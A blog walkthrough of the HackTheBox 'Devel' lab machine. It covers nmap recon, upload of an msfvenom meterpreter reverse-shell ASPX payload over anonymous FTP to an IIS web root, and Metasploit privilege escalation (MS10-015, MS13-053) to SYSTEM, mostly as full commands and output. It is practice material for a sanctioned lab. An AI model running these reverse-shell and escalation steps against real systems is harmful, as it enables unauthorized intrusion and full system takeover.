HackTheBox - Devel Walkthrough

July 13, 2019

Devel

Time for the 3rd box. Another windows machine, this time - unpatched Windows 7 with… weird anonymous read/write access to the document root :) Again not the most interesting initial foothold, but it’s a practice :)

1. Recon and Information gathering

Nmap

root@warmachine:/hackthebox/devel# nmap -sV -sC 10.10.10.5 -oN base_tcp.nmap
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-12 17:08 EEST
Nmap scan report for 10.10.10.5
Host is up (0.036s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Not much - ftp with anonymous + http.

Services

FTP

I have anonymous read/write permissions on what looks like the document root of the web server. Sweet!

HTTP

Just the default page for IIS Web server. Can confirm the content matches what I see in the ftp service.

2. Initial foothold/low priv access.

It looks like my best bet is to try a msfvenom payload for a reverse shell. And since it’s a Windows machine I prefer to make it a meterpreter one :)

root@warmachine:/hackthebox/devel/10.10.10.5# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.25 LPORT=4949  -f aspx > flame_n.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2815 bytes
root@warmachine:/hackthebox/devel/10.10.10.5# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put flame_n.aspx
local: flame_n.aspx remote: flame_n.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2851 bytes sent in 0.00 secs (7.9501 MB/s)

I’m using the “newer” aspx (at least compared with asp :)) as an output format since the server is running IIS 7.5. After uploading the payload I visit http://10.10.10.5/flame_n.aspx and get a callback to my msfconsole listener

meterpreter > getuid 
Server username: IIS APPPOOL\Web

Let’s check systeminfo:

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 ??
System Boot Time:          16/7/2019, 12:57:08 ??
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 28/7/2017
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 535 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.368 MB
Virtual Memory: In Use:    679 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5

Uh-oh.. looks like unpatched Windows 7 box, 32 bit. Running PowerUp with Invoke-AllChecks didn’t yield anything interesting.

I’ll check for some exploit suggestions with a script and with a metasploit module.

3. Privilege Escalation

Windows-Exploit-Suggester

First I’ll check with this script - https://github.com/GDSSecurity/Windows-Exploit-Suggester . I need to provide a copy of the output of systeminfo from the Windows box and get the Microsoft patch db:

root@warmachine:/opt/Windows-Exploit-Suggester# ./windows-exploit-suggester.py -u
[*] initiating winsploit version 3.3...
[+] writing to file 2019-07-13-mssb.xls
[*] done

root@warmachine:/opt/Windows-Exploit-Suggester# ./windows-exploit-suggester.py -i sysinfo_devel -d 2019-07-13-mssb.xls 
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits
[*] there are now 179 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 32-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

The output isn’t 100% correct but checking out the different vulns I find this as an metasploit module:

msf5 exploit(multi/handler) > search MS10-015

Matching Modules
================

   #  Name                                     Disclosure Date  Rank   Check  Description
   -  ----                                     ---------------  ----   -----  -----------
   0  exploit/windows/local/ms10_015_kitrap0d  2010-01-19       great  Yes    Windows SYSTEM Escalation via KiTrap0D


msf5 exploit(multi/handler) > options exploit/windows/local/ms10_015_kitrap0d

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)

Okay, so it should work for 32 bit Windows 7. Let’s try it:

msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] Launching notepad to host the exploit...
[+] Process 2276 launched.
[*] Reflectively injecting the exploit DLL into 2276...
[*] Injecting exploit into 2276 ...
[*] Exploit injected. Injecting payload into 2276...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.

Erm.. no session? What? And then I saw what I’m listening on… 10.0.2.15:4444 - my VM NAT address, not my htb VPN address. Quick change and then pwn:

msf5 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.25
lhost => 10.10.14.25
msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.25:4444 
[*] Launching notepad to host the exploit...
[+] Process 1952 launched.
[*] Reflectively injecting the exploit DLL into 1952...
[*] Injecting exploit into 1952 ...
[*] Exploit injected. Injecting payload into 1952...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.14.25:4444 -> 10.10.10.5:49160) at 2019-07-13 11:06:27 +0300

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

Nice! Let’s check the metasploit module for exploit suggesting:

Metasploit local_exploit_suggester

msf5 exploit(windows/local/ms10_015_kitrap0d) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 29 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

So again there’s exploit/windows/local/ms10_015_kitrap0d. I already played with that, I want to check if there’s anything else that works on the target. Like MS13-053

msf5 exploit(windows/local/ms10_092_schelevator) > use exploit/windows/local/ms13_053_schlamperei
msf5 exploit(windows/local/ms13_053_schlamperei) > set session 1
session => 1
msf5 exploit(windows/local/ms13_053_schlamperei) > run

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] Launching notepad to host the exploit...
[+] Process 4080 launched.
[*] Reflectively injecting the exploit DLL into 4080...
[*] Injecting exploit into 4080...
[*] Found winlogon.exe with PID 444
[+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms13_053_schlamperei) > set lhost 10.10.14.25
lhost => 10.10.14.25
msf5 exploit(windows/local/ms13_053_schlamperei) > set lport 5555
lport => 5555
msf5 exploit(windows/local/ms13_053_schlamperei) > run

[*] Started reverse TCP handler on 10.10.14.25:5555 
[*] Launching notepad to host the exploit...
[+] Process 976 launched.
[*] Reflectively injecting the exploit DLL into 976...
[*] Injecting exploit into 976...
[*] Found winlogon.exe with PID 444
[+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 3 opened (10.10.14.25:5555 -> 10.10.10.5:49165) at 2019-07-13 11:15:08 +0300

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Again after fixing the listening address I get SYSTEM. Let’s get my flags and call it a day :)

c:\Users>type c:\users\babis\desktop\user.txt.txt
type c:\users\babis\desktop\user.txt.txt
<...>

c:\Users>type c:\users\administrator\desktop\root.txt.txt
type c:\users\administrator\desktop\root.txt.txt
<...>